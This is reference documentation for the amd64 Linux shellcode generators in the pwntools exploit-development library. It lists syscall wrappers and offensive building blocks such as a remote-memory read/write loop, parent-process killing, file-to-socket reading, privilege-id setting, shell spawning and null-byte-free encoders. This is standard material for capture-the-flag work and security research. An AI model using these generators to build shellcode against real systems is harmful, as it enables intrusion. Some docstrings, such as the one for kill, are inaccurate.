fstat64
(fd, buf)[source]¶ Invokes the syscall fstat64. See ‘man 2 fstat64’ for more information.
Parameters:
-
pwnlib.shellcraft.amd64.linux.
fstatat64
(fd, file, buf, flag)[source]¶ Invokes the syscall fstatat64. See ‘man 2 fstatat64’ for more information.
Parameters:
-
pwnlib.shellcraft.amd64.linux.
fsync
(fd)[source]¶ Invokes the syscall fsync. See ‘man 2 fsync’ for more information.
Parameters: fd (int) – fd
-
pwnlib.shellcraft.amd64.linux.
ftruncate
(fd, length)[source]¶ Invokes the syscall ftruncate. See ‘man 2 ftruncate’ for more information.
Parameters: - fd (int) – fd
- length (off_t) – length
-
pwnlib.shellcraft.amd64.linux.
ftruncate64
(fd, length)[source]¶ Invokes the syscall ftruncate64. See ‘man 2 ftruncate64’ for more information.
Parameters: - fd (int) – fd
- length (off64_t) – length
-
pwnlib.shellcraft.amd64.linux.
futimesat
(fd, file, tvp)[source]¶ Invokes the syscall futimesat. See ‘man 2 futimesat’ for more information.
Parameters: - fd (int) – fd
- file (char) – file
- tvp (timeval) – tvp
-
pwnlib.shellcraft.amd64.linux.
getcwd
(buf, size)[source]¶ Invokes the syscall getcwd. See ‘man 2 getcwd’ for more information.
Parameters: - buf (char) – buf
- size (size_t) – size
-
pwnlib.shellcraft.amd64.linux.
getegid
()[source]¶ Invokes the syscall getegid. See ‘man 2 getegid’ for more information.
Arguments:
-
pwnlib.shellcraft.amd64.linux.
geteuid
()[source]¶ Invokes the syscall geteuid. See ‘man 2 geteuid’ for more information.
Arguments:
-
pwnlib.shellcraft.amd64.linux.
getgid
()[source]¶ Invokes the syscall getgid. See ‘man 2 getgid’ for more information.
Arguments:
-
pwnlib.shellcraft.amd64.linux.
getgroups
(size, list)[source]¶ Invokes the syscall getgroups. See ‘man 2 getgroups’ for more information.
Parameters: - size (int) – size
- list (gid_t) – list
-
pwnlib.shellcraft.amd64.linux.
getitimer
(which, value)[source]¶ Invokes the syscall getitimer. See ‘man 2 getitimer’ for more information.
Parameters: - which (itimer_which_t) – which
- value (itimerval) – value
-
pwnlib.shellcraft.amd64.linux.
getpeername
(fd, addr, length)[source]¶ Invokes the syscall getpeername. See ‘man 2 getpeername’ for more information.
Parameters: - fd (int) – fd
- addr (SOCKADDR_ARG) – addr
- len (socklen_t) – len
-
pwnlib.shellcraft.amd64.linux.
getpgid
(pid)[source]¶ Invokes the syscall getpgid. See ‘man 2 getpgid’ for more information.
Parameters: pid (pid_t) – pid
-
pwnlib.shellcraft.amd64.linux.
getpgrp
()[source]¶ Invokes the syscall getpgrp. See ‘man 2 getpgrp’ for more information.
Arguments:
-
pwnlib.shellcraft.amd64.linux.
getpmsg
(fildes, ctlptr, dataptr, bandp, flagsp)[source]¶ Invokes the syscall getpmsg. See ‘man 2 getpmsg’ for more information.
Parameters:
-
pwnlib.shellcraft.amd64.linux.
getppid
()[source]¶ Invokes the syscall getppid. See ‘man 2 getppid’ for more information.
Arguments:
-
pwnlib.shellcraft.amd64.linux.
getpriority
(which, who)[source]¶ Invokes the syscall getpriority. See ‘man 2 getpriority’ for more information.
Parameters: - which (priority_which_t) – which
- who (id_t) – who
-
pwnlib.shellcraft.amd64.linux.
getresgid
(rgid, egid, sgid)[source]¶ Invokes the syscall getresgid. See ‘man 2 getresgid’ for more information.
Parameters: - rgid (gid_t) – rgid
- egid (gid_t) – egid
- sgid (gid_t) – sgid
-
pwnlib.shellcraft.amd64.linux.
getresuid
(ruid, euid, suid)[source]¶ Invokes the syscall getresuid. See ‘man 2 getresuid’ for more information.
Parameters: - ruid (uid_t) – ruid
- euid (uid_t) – euid
- suid (uid_t) – suid
-
pwnlib.shellcraft.amd64.linux.
getrlimit
(resource, rlimits)[source]¶ Invokes the syscall getrlimit. See ‘man 2 getrlimit’ for more information.
Parameters: - resource (rlimit_resource_t) – resource
- rlimits (rlimit) – rlimits
-
pwnlib.shellcraft.amd64.linux.
getrusage
(who, usage)[source]¶ Invokes the syscall getrusage. See ‘man 2 getrusage’ for more information.
Parameters: - who (rusage_who_t) – who
- usage (rusage) – usage
-
pwnlib.shellcraft.amd64.linux.
getsid
(pid)[source]¶ Invokes the syscall getsid. See ‘man 2 getsid’ for more information.
Parameters: pid (pid_t) – pid
-
pwnlib.shellcraft.amd64.linux.
getsockname
(fd, addr, length)[source]¶ Invokes the syscall getsockname. See ‘man 2 getsockname’ for more information.
Parameters: - fd (int) – fd
- addr (SOCKADDR_ARG) – addr
- len (socklen_t) – len
-
pwnlib.shellcraft.amd64.linux.
getsockopt
(fd, level, optname, optval, optlen)[source]¶ Invokes the syscall getsockopt. See ‘man 2 getsockopt’ for more information.
Parameters:
-
pwnlib.shellcraft.amd64.linux.
gettimeofday
(tv, tz)[source]¶ Invokes the syscall gettimeofday. See ‘man 2 gettimeofday’ for more information.
Parameters: - tv (timeval) – tv
- tz (timezone_ptr_t) – tz
-
pwnlib.shellcraft.amd64.linux.
getuid
()[source]¶ Invokes the syscall getuid. See ‘man 2 getuid’ for more information.
Arguments:
-
pwnlib.shellcraft.amd64.linux.
gtty
(fd, params)[source]¶ Invokes the syscall gtty. See ‘man 2 gtty’ for more information.
Parameters: - fd (int) – fd
- params (sgttyb) – params
-
pwnlib.shellcraft.amd64.linux.
ioctl
(fd, request, vararg)[source]¶ Invokes the syscall ioctl. See ‘man 2 ioctl’ for more information.
Parameters:
-
pwnlib.shellcraft.amd64.linux.
ioperm
(from_, num, turn_on)[source]¶ Invokes the syscall ioperm. See ‘man 2 ioperm’ for more information.
Parameters: - from (unsigned) – from
- num (unsigned) – num
- turn_on (int) – turn_on
-
pwnlib.shellcraft.amd64.linux.
iopl
(level)[source]¶ Invokes the syscall iopl. See ‘man 2 iopl’ for more information.
Parameters: level (int) – level
-
pwnlib.shellcraft.amd64.linux.
kill
(pid, signal='SIGKILL')[source]¶ Writes a string to a file descriptor
-
pwnlib.shellcraft.amd64.linux.
killparent
()[source]¶ Kills its parent process until whatever the parent is (probably init) cannot be killed any longer.
-
pwnlib.shellcraft.amd64.linux.
lchown
(file, owner, group)[source]¶ Invokes the syscall lchown. See ‘man 2 lchown’ for more information.
Parameters: - file (char) – file
- owner (uid_t) – owner
- group (gid_t) – group
-
pwnlib.shellcraft.amd64.linux.
link
(from_, to)[source]¶ Invokes the syscall link. See ‘man 2 link’ for more information.
Parameters: - from (char) – from
- to (char) – to
-
pwnlib.shellcraft.amd64.linux.
linkat
(fromfd, from_, tofd, to, flags)[source]¶ Invokes the syscall linkat. See ‘man 2 linkat’ for more information.
Parameters:
-
pwnlib.shellcraft.amd64.linux.
listen
(port, network)[source]¶ Listens on a TCP port, accept a client and leave his socket in RAX. Port is the TCP port to listen on, network is either ‘ipv4’ or ‘ipv6’.
-
pwnlib.shellcraft.amd64.linux.
loader
(address)[source]¶ Loads a statically-linked ELF into memory and transfers control.
Parameters: address (int) – Address of the ELF as a register or integer.
-
pwnlib.shellcraft.amd64.linux.
loader_append
(data=None)[source]¶ Loads a statically-linked ELF into memory and transfers control.
Similar to loader.asm but loads an appended ELF.
Parameters: data (str) – If a valid filename, the data is loaded from the named file. Otherwise, this is treated as raw ELF data to append. If None
, it is ignored.Example
>>> gcc = process(['gcc','-m64','-xc','-static','-Wl,-Ttext-segment=0x20000000','-']) >>> gcc.write(''' ... int main() { ... printf("Hello, %s!\\n", "amd64"); ... } ... ''') >>> gcc.shutdown('send') >>> gcc.poll(True) 0 >>> sc = shellcraft.loader_append('a.out')
The following doctest is commented out because it doesn’t work on Travis for reasons I cannot diagnose. However, it should work just fine :-)
# >>> run_assembly(sc).recvline() == ‘Hello, amd64!n’ # True
-
pwnlib.shellcraft.amd64.linux.
lseek
(fd, offset, whence)[source]¶ Invokes the syscall lseek. See ‘man 2 lseek’ for more information.
Parameters:
-
pwnlib.shellcraft.amd64.linux.
lstat
(file, buf)[source]¶ Invokes the syscall lstat. See ‘man 2 lstat’ for more information.
Parameters: - file (char) – file
- buf (stat) – buf
-
pwnlib.shellcraft.amd64.linux.
lstat64
(file, buf)[source]¶ Invokes the syscall lstat64. See ‘man 2 lstat64’ for more information.
Parameters: - file (char) – file
- buf (stat64) – buf
-
pwnlib.shellcraft.amd64.linux.
madvise
(addr, length, advice)[source]¶ Invokes the syscall madvise. See ‘man 2 madvise’ for more information.
Parameters: - addr (void) – addr
- len (size_t) – len
- advice (int) – advice
-
pwnlib.shellcraft.amd64.linux.
membot
(readsock=0, writesock=1)[source]¶ Read-write access to a remote process’ memory.
Provide a single pointer-width value to determine the operation to perform:
- 0: Exit the loop
- 1: Read data
- 2: Write data
-
pwnlib.shellcraft.amd64.linux.
mincore
(start, length, vec)[source]¶ Invokes the syscall mincore. See ‘man 2 mincore’ for more information.
Parameters: - start (void) – start
- len (size_t) – len
- vec (unsigned) – vec
-
pwnlib.shellcraft.amd64.linux.
mkdir
(path, mode)[source]¶ Invokes the syscall mkdir. See ‘man 2 mkdir’ for more information.
Parameters: - path (char) – path
- mode (mode_t) – mode
-
pwnlib.shellcraft.amd64.linux.
mkdirat
(fd, path, mode)[source]¶ Invokes the syscall mkdirat. See ‘man 2 mkdirat’ for more information.
Parameters: - fd (int) – fd
- path (char) – path
- mode (mode_t) – mode
-
pwnlib.shellcraft.amd64.linux.
mknod
(path, mode, dev)[source]¶ Invokes the syscall mknod. See ‘man 2 mknod’ for more information.
Parameters: - path (char) – path
- mode (mode_t) – mode
- dev (dev_t) – dev
-
pwnlib.shellcraft.amd64.linux.
mknodat
(fd, path, mode, dev)[source]¶ Invokes the syscall mknodat. See ‘man 2 mknodat’ for more information.
Parameters: - fd (int) – fd
- path (char) – path
- mode (mode_t) – mode
- dev (dev_t) – dev
-
pwnlib.shellcraft.amd64.linux.
mlock
(addr, length)[source]¶ Invokes the syscall mlock. See ‘man 2 mlock’ for more information.
Parameters: - addr (void) – addr
- len (size_t) – len
-
pwnlib.shellcraft.amd64.linux.
mlockall
(flags)[source]¶ Invokes the syscall mlockall. See ‘man 2 mlockall’ for more information.
Parameters: flags (int) – flags
-
pwnlib.shellcraft.amd64.linux.
mmap
(addr=0, length=4096, prot=7, flags=34, fd=-1, offset=0)[source]¶ Invokes the syscall mmap. See ‘man 2 mmap’ for more information.
Parameters:
-
pwnlib.shellcraft.amd64.linux.
mmap_rwx
(size=4096, protection=7, address=None)[source]¶ Maps some memory
-
pwnlib.shellcraft.amd64.linux.
mov
(dest, src, stack_allowed=True)[source]¶ Move src into dest without newlines and null bytes.
If the src is a register smaller than the dest, then it will be zero-extended to fit inside the larger register.
If the src is a register larger than the dest, then only some of the bits will be used.
If src is a string that is not a register, then it will locally set context.arch to ‘amd64’ and use
pwnlib.constants.eval()
to evaluate the string. Note that this means that this shellcode can change behavior depending on the value of context.os.Example
>>> print shellcraft.amd64.mov('eax','ebx').rstrip() mov eax, ebx >>> print shellcraft.amd64.mov('eax', 0).rstrip() xor eax, eax /* 0 */ >>> print shellcraft.amd64.mov('ax', 0).rstrip() xor ax, ax /* 0 */ >>> print shellcraft.amd64.mov('rax', 0).rstrip() xor eax, eax /* 0 */ >>> print shellcraft.amd64.mov('rdi', 'ax').rstrip() movzx edi, ax >>> print shellcraft.amd64.mov('al', 'ax').rstrip() /* moving ax into al, but this is a no-op */ >>> print shellcraft.amd64.mov('ax', 'bl').rstrip() movzx ax, bl >>> print shellcraft.amd64.mov('eax', 1).rstrip() push 1 pop rax >>> print shellcraft.amd64.mov('rax', 0xc0).rstrip() xor eax, eax mov al, 0xc0 >>> print shellcraft.amd64.mov('rax', 0xc000).rstrip() xor eax, eax mov ah, 0xc000 >> 8 >>> print shellcraft.amd64.mov('rax', 0xc0c0).rstrip() xor eax, eax mov ax, 0xc0c0 >>> print shellcraft.amd64.mov('rdi', 0xff).rstrip() mov edi, 0x1010101 /* 255 == 0xff */ xor edi, 0x10101fe >>> print shellcraft.amd64.mov('rax', 0xdead00ff).rstrip() mov eax, 0x1010101 /* 3735879935 == 0xdead00ff */ xor eax, 0xdfac01fe >>> print shellcraft.amd64.mov('rax', 0x11dead00ff).rstrip() mov rax, 0x101010101010101 /* 76750323967 == 0x11dead00ff */ push rax mov rax, 0x1010110dfac01fe xor [rsp], rax pop rax
>>> with context.local(os = 'linux'): ... print shellcraft.amd64.mov('eax', 'SYS_read').rstrip() xor eax, eax /* (SYS_read) */ >>> with context.local(os = 'freebsd'): ... print shellcraft.amd64.mov('eax', 'SYS_read').rstrip() push (SYS_read) /* 3 */ pop rax >>> with context.local(os = 'linux'): ... print shellcraft.amd64.mov('eax', 'PROT_READ | PROT_WRITE | PROT_EXEC').rstrip() push (PROT_READ | PROT_WRITE | PROT_EXEC) /* 7 */ pop rax
Parameters:
-
pwnlib.shellcraft.amd64.linux.
mprotect
(addr, length, prot)[source]¶ Invokes the syscall mprotect. See ‘man 2 mprotect’ for more information.
Parameters: - addr (void) – addr
- length (size_t) – length
- prot (int) – prot
-
pwnlib.shellcraft.amd64.linux.
mq_notify
(mqdes, notification)[source]¶ Invokes the syscall mq_notify. See ‘man 2 mq_notify’ for more information.
Parameters: - mqdes (mqd_t) – mqdes
- notification (sigevent) – notification
-
pwnlib.shellcraft.amd64.linux.
mq_open
(name, oflag, vararg)[source]¶ Invokes the syscall mq_open. See ‘man 2 mq_open’ for more information.
Parameters:
-
pwnlib.shellcraft.amd64.linux.
mq_timedreceive
(mqdes, msg_ptr, msg_len, msg_prio, abs_timeout)[source]¶ Invokes the syscall mq_timedreceive. See ‘man 2 mq_timedreceive’ for more information.
Parameters: - mqdes (mqd_t) – mqdes
- msg_ptr (char) – msg_ptr
- msg_len (size_t) – msg_len
- msg_prio (unsigned) – msg_prio
- abs_timeout (timespec) – abs_timeout
-
pwnlib.shellcraft.amd64.linux.
mq_timedsend
(mqdes, msg_ptr, msg_len, msg_prio, abs_timeout)[source]¶ Invokes the syscall mq_timedsend. See ‘man 2 mq_timedsend’ for more information.
Parameters: - mqdes (mqd_t) – mqdes
- msg_ptr (char) – msg_ptr
- msg_len (size_t) – msg_len
- msg_prio (unsigned) – msg_prio
- abs_timeout (timespec) – abs_timeout
-
pwnlib.shellcraft.amd64.linux.
mq_unlink
(name)[source]¶ Invokes the syscall mq_unlink. See ‘man 2 mq_unlink’ for more information.
Parameters: name (char) – name
-
pwnlib.shellcraft.amd64.linux.
mremap
(addr, old_len, new_len, flags, vararg)[source]¶ Invokes the syscall mremap. See ‘man 2 mremap’ for more information.
Parameters:
-
pwnlib.shellcraft.amd64.linux.
msync
(addr, length, flags)[source]¶ Invokes the syscall msync. See ‘man 2 msync’ for more information.
Parameters: - addr (void) – addr
- len (size_t) – len
- flags (int) – flags
-
pwnlib.shellcraft.amd64.linux.
munlock
(addr, length)[source]¶ Invokes the syscall munlock. See ‘man 2 munlock’ for more information.
Parameters: - addr (void) – addr
- len (size_t) – len
-
pwnlib.shellcraft.amd64.linux.
munlockall
()[source]¶ Invokes the syscall munlockall. See ‘man 2 munlockall’ for more information.
Arguments:
-
pwnlib.shellcraft.amd64.linux.
munmap
(addr, length)[source]¶ Invokes the syscall munmap. See ‘man 2 munmap’ for more information.
Parameters: - addr (void) – addr
- len (size_t) – len
-
pwnlib.shellcraft.amd64.linux.
nanosleep
(requested_time, remaining)[source]¶ Invokes the syscall nanosleep. See ‘man 2 nanosleep’ for more information.
Parameters: - requested_time (timespec) – requested_time
- remaining (timespec) – remaining
-
pwnlib.shellcraft.amd64.linux.
nice
(inc)[source]¶ Invokes the syscall nice. See ‘man 2 nice’ for more information.
Parameters: inc (int) – inc
-
pwnlib.shellcraft.amd64.linux.
open
(file, oflag, vararg)[source]¶ Invokes the syscall open. See ‘man 2 open’ for more information.
Parameters:
-
pwnlib.shellcraft.amd64.linux.
openat
(fd, file, oflag, vararg)[source]¶ Invokes the syscall openat. See ‘man 2 openat’ for more information.
Parameters:
-
pwnlib.shellcraft.amd64.linux.
pause
()[source]¶ Invokes the syscall pause. See ‘man 2 pause’ for more information.
Arguments:
-
pwnlib.shellcraft.amd64.linux.
pipe
(pipedes)[source]¶ Invokes the syscall pipe. See ‘man 2 pipe’ for more information.
Parameters: pipedes (int) – pipedes
-
pwnlib.shellcraft.amd64.linux.
pipe2
(pipedes, flags)[source]¶ Invokes the syscall pipe2. See ‘man 2 pipe2’ for more information.
Parameters:
-
pwnlib.shellcraft.amd64.linux.
poll
(fds, nfds, timeout)[source]¶ Invokes the syscall poll. See ‘man 2 poll’ for more information.
Parameters: - fds (pollfd) – fds
- nfds (nfds_t) – nfds
- timeout (int) – timeout
-
pwnlib.shellcraft.amd64.linux.
ppoll
(fds, nfds, timeout, ss)[source]¶ Invokes the syscall ppoll. See ‘man 2 ppoll’ for more information.
Parameters: - fds (pollfd) – fds
- nfds (nfds_t) – nfds
- timeout (timespec) – timeout
- ss (sigset_t) – ss
-
pwnlib.shellcraft.amd64.linux.
prctl
(option, *vararg)[source]¶ Invokes the syscall prctl. See ‘man 2 prctl’ for more information.
Parameters:
-
pwnlib.shellcraft.amd64.linux.
pread
(fd, buf, nbytes, offset)[source]¶ Invokes the syscall pread. See ‘man 2 pread’ for more information.
Parameters: - fd (int) – fd
- buf (void) – buf
- nbytes (size_t) – nbytes
- offset (off_t) – offset
-
pwnlib.shellcraft.amd64.linux.
preadv
(fd, iovec, count, offset)[source]¶ Invokes the syscall preadv. See ‘man 2 preadv’ for more information.
Parameters:
-
pwnlib.shellcraft.amd64.linux.
prlimit64
(pid, resource, new_limit, old_limit)[source]¶ Invokes the syscall prlimit64. See ‘man 2 prlimit64’ for more information.
Parameters: - pid (pid_t) – pid
- resource (rlimit_resource) – resource
- new_limit (rlimit64) – new_limit
- old_limit (rlimit64) – old_limit
-
pwnlib.shellcraft.amd64.linux.
profil
(sample_buffer, size, offset, scale)[source]¶ Invokes the syscall profil. See ‘man 2 profil’ for more information.
Parameters: - sample_buffer (unsigned) – sample_buffer
- size (size_t) – size
- offset (size_t) – offset
- scale (unsigned) – scale
-
pwnlib.shellcraft.amd64.linux.
ptrace
(request, *vararg)[source]¶ Invokes the syscall ptrace. See ‘man 2 ptrace’ for more information.
Parameters: - request (ptrace_request) – request
- vararg (int) – vararg
-
pwnlib.shellcraft.amd64.linux.
push
(value)[source]¶ Pushes a value onto the stack without using null bytes or newline characters.
If src is a string, then we try to evaluate with context.arch = ‘amd64’ using
pwnlib.constants.eval()
before determining how to push it. Note that this means that this shellcode can change behavior depending on the value of context.os.Parameters: value (int,str) – The value or register to push Example
>>> print pwnlib.shellcraft.amd64.push(0).rstrip() /* push 0 */ push 1 dec byte ptr [rsp] >>> print pwnlib.shellcraft.amd64.push(1).rstrip() /* push 1 */ push 1 >>> print pwnlib.shellcraft.amd64.push(256).rstrip() /* push 256 */ push 0x1010201 ^ 0x100 xor dword ptr [rsp], 0x1010201 >>> with context.local(os = 'linux'): ... print pwnlib.shellcraft.amd64.push('SYS_write').rstrip() /* push 'SYS_write' */ push 1 >>> with context.local(os = 'freebsd'): ... print pwnlib.shellcraft.amd64.push('SYS_write').rstrip() /* push 'SYS_write' */ push 4
-
pwnlib.shellcraft.amd64.linux.
putpmsg
(fildes, ctlptr, dataptr, band, flags)[source]¶ Invokes the syscall putpmsg. See ‘man 2 putpmsg’ for more information.
Parameters:
-
pwnlib.shellcraft.amd64.linux.
pwrite
(fd, buf, n, offset)[source]¶ Invokes the syscall pwrite. See ‘man 2 pwrite’ for more information.
Parameters: - fd (int) – fd
- buf (void) – buf
- n (size_t) – n
- offset (off_t) – offset
-
pwnlib.shellcraft.amd64.linux.
pwritev
(fd, iovec, count, offset)[source]¶ Invokes the syscall pwritev. See ‘man 2 pwritev’ for more information.
Parameters:
-
pwnlib.shellcraft.amd64.linux.
read
(fd=0, buffer='rsp', count=8)[source]¶ Reads data from the file descriptor into the provided buffer. This is a one-shot and does not fill the request.
-
pwnlib.shellcraft.amd64.linux.
read_upto
(fd=0, buffer='rsp', sizereg='rdx')[source]¶ Reads up to N bytes 8 bytes into the specified register
-
pwnlib.shellcraft.amd64.linux.
readahead
(fd, offset, count)[source]¶ Invokes the syscall readahead. See ‘man 2 readahead’ for more information.
Parameters: - fd (int) – fd
- offset (off64_t) – offset
- count (size_t) – count
-
pwnlib.shellcraft.amd64.linux.
readdir
(dirp)[source]¶ Invokes the syscall readdir. See ‘man 2 readdir’ for more information.
Parameters: dirp (DIR) – dirp
-
pwnlib.shellcraft.amd64.linux.
readfile
(path, dst='rdi')[source]¶ Args: [path, dst (imm/reg) = rdi ] Opens the specified file path and sends its content to the specified file descriptor.
-
pwnlib.shellcraft.amd64.linux.
readinto
(sock=0)[source]¶ Reads into a buffer of a size and location determined at runtime. When the shellcode is executing, it should send a pointer and pointer-width size to determine the location and size of buffer.
-
pwnlib.shellcraft.amd64.linux.
readlink
(path, buf, length)[source]¶ Invokes the syscall readlink. See ‘man 2 readlink’ for more information.
Parameters: - path (char) – path
- buf (char) – buf
- len (size_t) – len
-
pwnlib.shellcraft.amd64.linux.
readlinkat
(fd, path, buf, length)[source]¶ Invokes the syscall readlinkat. See ‘man 2 readlinkat’ for more information.
Parameters: - fd (int) – fd
- path (char) – path
- buf (char) – buf
- len (size_t) – len
-
pwnlib.shellcraft.amd64.linux.
readloop
(sock=0)[source]¶ Reads into a buffer of a size and location determined at runtime. When the shellcode is executing, it should send a pointer and pointer-width size to determine the location and size of buffer.
-
pwnlib.shellcraft.amd64.linux.
readn
(fd, buf, nbytes)[source]¶ Reads exactly nbytes bytes from file descriptor fd into the buffer buf.
Parameters: - fd (int) – fd
- buf (void) – buf
- nbytes (size_t) – nbytes
-
pwnlib.shellcraft.amd64.linux.
readptr
(fd=0, target_reg='rdx')[source]¶ Reads 8 bytes into the specified register
-
pwnlib.shellcraft.amd64.linux.
readv
(fd, iovec, count)[source]¶ Invokes the syscall readv. See ‘man 2 readv’ for more information.
Parameters:
-
pwnlib.shellcraft.amd64.linux.
recv
(fd, buf, n, flags)[source]¶ Invokes the syscall recv. See ‘man 2 recv’ for more information.
Parameters:
-
pwnlib.shellcraft.amd64.linux.
recvfrom
(fd, buf, n, flags, addr, addr_len)[source]¶ Invokes the syscall recvfrom. See ‘man 2 recvfrom’ for more information.
Parameters:
-
pwnlib.shellcraft.amd64.linux.
recvmmsg
(fd, vmessages, vlen, flags, tmo)[source]¶ Invokes the syscall recvmmsg. See ‘man 2 recvmmsg’ for more information.
Parameters:
-
pwnlib.shellcraft.amd64.linux.
recvmsg
(fd, message, flags)[source]¶ Invokes the syscall recvmsg. See ‘man 2 recvmsg’ for more information.
Parameters:
-
pwnlib.shellcraft.amd64.linux.
recvsize
(sock, reg='rcx')[source]¶ Recives 4 bytes size field Useful in conjuncion with findpeer and stager :param sock, the socket to read the payload from.: :param reg, the place to put the size: :type reg, the place to put the size: default ecx
Leaves socket in ebx
-
pwnlib.shellcraft.amd64.linux.
remap_file_pages
(start, size, prot, pgoff, flags)[source]¶ Invokes the syscall remap_file_pages. See ‘man 2 remap_file_pages’ for more information.
Parameters:
-
pwnlib.shellcraft.amd64.linux.
rename
(old, new)[source]¶ Invokes the syscall rename. See ‘man 2 rename’ for more information.
Parameters: - old (char) – old
- new (char) – new
-
pwnlib.shellcraft.amd64.linux.
renameat
(oldfd, old, newfd, new)[source]¶ Invokes the syscall renameat. See ‘man 2 renameat’ for more information.
Parameters:
-
pwnlib.shellcraft.amd64.linux.
rmdir
(path)[source]¶ Invokes the syscall rmdir. See ‘man 2 rmdir’ for more information.
Parameters: path (char) – path
-
pwnlib.shellcraft.amd64.linux.
sched_get_priority_max
(algorithm)[source]¶ Invokes the syscall sched_get_priority_max. See ‘man 2 sched_get_priority_max’ for more information.
Parameters: algorithm (int) – algorithm
-
pwnlib.shellcraft.amd64.linux.
sched_get_priority_min
(algorithm)[source]¶ Invokes the syscall sched_get_priority_min. See ‘man 2 sched_get_priority_min’ for more information.
Parameters: algorithm (int) – algorithm
-
pwnlib.shellcraft.amd64.linux.
sched_getaffinity
(pid, cpusetsize, cpuset)[source]¶ Invokes the syscall sched_getaffinity. See ‘man 2 sched_getaffinity’ for more information.
Parameters: - pid (pid_t) – pid
- cpusetsize (size_t) – cpusetsize
- cpuset (cpu_set_t) – cpuset
-
pwnlib.shellcraft.amd64.linux.
sched_getparam
(pid, param)[source]¶ Invokes the syscall sched_getparam. See ‘man 2 sched_getparam’ for more information.
Parameters: - pid (pid_t) – pid
- param (sched_param) – param
-
pwnlib.shellcraft.amd64.linux.
sched_getscheduler
(pid)[source]¶ Invokes the syscall sched_getscheduler. See ‘man 2 sched_getscheduler’ for more information.
Parameters: pid (pid_t) – pid
-
pwnlib.shellcraft.amd64.linux.
sched_rr_get_interval
(pid, t)[source]¶ Invokes the syscall sched_rr_get_interval. See ‘man 2 sched_rr_get_interval’ for more information.
Parameters: - pid (pid_t) – pid
- t (timespec) – t
-
pwnlib.shellcraft.amd64.linux.
sched_setaffinity
(pid, cpusetsize, cpuset)[source]¶ Invokes the syscall sched_setaffinity. See ‘man 2 sched_setaffinity’ for more information.
Parameters: - pid (pid_t) – pid
- cpusetsize (size_t) – cpusetsize
- cpuset (cpu_set_t) – cpuset
-
pwnlib.shellcraft.amd64.linux.
sched_setparam
(pid, param)[source]¶ Invokes the syscall sched_setparam. See ‘man 2 sched_setparam’ for more information.
Parameters: - pid (pid_t) – pid
- param (sched_param) – param
-
pwnlib.shellcraft.amd64.linux.
sched_setscheduler
(pid, policy, param)[source]¶ Invokes the syscall sched_setscheduler. See ‘man 2 sched_setscheduler’ for more information.
Parameters: - pid (pid_t) – pid
- policy (int) – policy
- param (sched_param) – param
-
pwnlib.shellcraft.amd64.linux.
sched_yield
()[source]¶ Invokes the syscall sched_yield. See ‘man 2 sched_yield’ for more information.
Arguments:
-
pwnlib.shellcraft.amd64.linux.
select
(nfds, readfds, writefds, exceptfds, timeout)[source]¶ Invokes the syscall select. See ‘man 2 select’ for more information.
Parameters: - nfds (int) – nfds
- readfds (fd_set) – readfds
- writefds (fd_set) – writefds
- exceptfds (fd_set) – exceptfds
- timeout (timeval) – timeout
-
pwnlib.shellcraft.amd64.linux.
sendfile
(out_fd, in_fd, offset, count)[source]¶ Invokes the syscall sendfile. See ‘man 2 sendfile’ for more information.
Parameters:
-
pwnlib.shellcraft.amd64.linux.
sendfile64
(out_fd, in_fd, offset, count)[source]¶ Invokes the syscall sendfile64. See ‘man 2 sendfile64’ for more information.
Parameters:
-
pwnlib.shellcraft.amd64.linux.
setdomainname
(name, length)[source]¶ Invokes the syscall setdomainname. See ‘man 2 setdomainname’ for more information.
Parameters: - name (char) – name
- len (size_t) – len
-
pwnlib.shellcraft.amd64.linux.
setgid
(gid)[source]¶ Invokes the syscall setgid. See ‘man 2 setgid’ for more information.
Parameters: gid (gid_t) – gid
-
pwnlib.shellcraft.amd64.linux.
setgroups
(n, groups)[source]¶ Invokes the syscall setgroups. See ‘man 2 setgroups’ for more information.
Parameters: - n (size_t) – n
- groups (gid_t) – groups
-
pwnlib.shellcraft.amd64.linux.
sethostname
(name, length)[source]¶ Invokes the syscall sethostname. See ‘man 2 sethostname’ for more information.
Parameters: - name (char) – name
- len (size_t) – len
-
pwnlib.shellcraft.amd64.linux.
setitimer
(which, new, old)[source]¶ Invokes the syscall setitimer. See ‘man 2 setitimer’ for more information.
Parameters: - which (itimer_which_t) – which
- new (itimerval) – new
- old (itimerval) – old
-
pwnlib.shellcraft.amd64.linux.
setpgid
(pid, pgid)[source]¶ Invokes the syscall setpgid. See ‘man 2 setpgid’ for more information.
Parameters: - pid (pid_t) – pid
- pgid (pid_t) – pgid
-
pwnlib.shellcraft.amd64.linux.
setpriority
(which, who, prio)[source]¶ Invokes the syscall setpriority. See ‘man 2 setpriority’ for more information.
Parameters: - which (priority_which_t) – which
- who (id_t) – who
- prio (int) – prio
-
pwnlib.shellcraft.amd64.linux.
setregid
(gid='egid')[source]¶ Args: [gid (imm/reg) = egid] Sets the real and effective group id.
-
pwnlib.shellcraft.amd64.linux.
setresgid
(rgid, egid, sgid)[source]¶ Invokes the syscall setresgid. See ‘man 2 setresgid’ for more information.
Parameters: - rgid (gid_t) – rgid
- egid (gid_t) – egid
- sgid (gid_t) – sgid
-
pwnlib.shellcraft.amd64.linux.
setresuid
(ruid, euid, suid)[source]¶ Invokes the syscall setresuid. See ‘man 2 setresuid’ for more information.
Parameters: - ruid (uid_t) – ruid
- euid (uid_t) – euid
- suid (uid_t) – suid
-
pwnlib.shellcraft.amd64.linux.
setreuid
(uid='euid')[source]¶ Args: [uid (imm/reg) = euid] Sets the real and effective user id.
-
pwnlib.shellcraft.amd64.linux.
setrlimit
(resource, rlimits)[source]¶ Invokes the syscall setrlimit. See ‘man 2 setrlimit’ for more information.
Parameters: - resource (rlimit_resource_t) – resource
- rlimits (rlimit) – rlimits
-
pwnlib.shellcraft.amd64.linux.
setsid
()[source]¶ Invokes the syscall setsid. See ‘man 2 setsid’ for more information.
Arguments:
-
pwnlib.shellcraft.amd64.linux.
setsockopt
(sockfd, level, optname, optval, optlen)[source]¶ Invokes the syscall setsockopt. See ‘man 2 setsockopt’ for more information.
Parameters:
-
pwnlib.shellcraft.amd64.linux.
setsockopt_timeout
(sock, secs)[source]¶ Invokes the syscall for setsockopt to set a timeout on a socket in seconds. See ‘man 2 setsockopt’ for more information.
Parameters:
-
pwnlib.shellcraft.amd64.linux.
settimeofday
(tv, tz)[source]¶ Invokes the syscall settimeofday. See ‘man 2 settimeofday’ for more information.
Parameters: - tv (timeval) – tv
- tz (timezone) – tz
-
pwnlib.shellcraft.amd64.linux.
setuid
(uid)[source]¶ Invokes the syscall setuid. See ‘man 2 setuid’ for more information.
Parameters: uid (uid_t) – uid
-
pwnlib.shellcraft.amd64.linux.
sh
()[source]¶ Execute a different process.
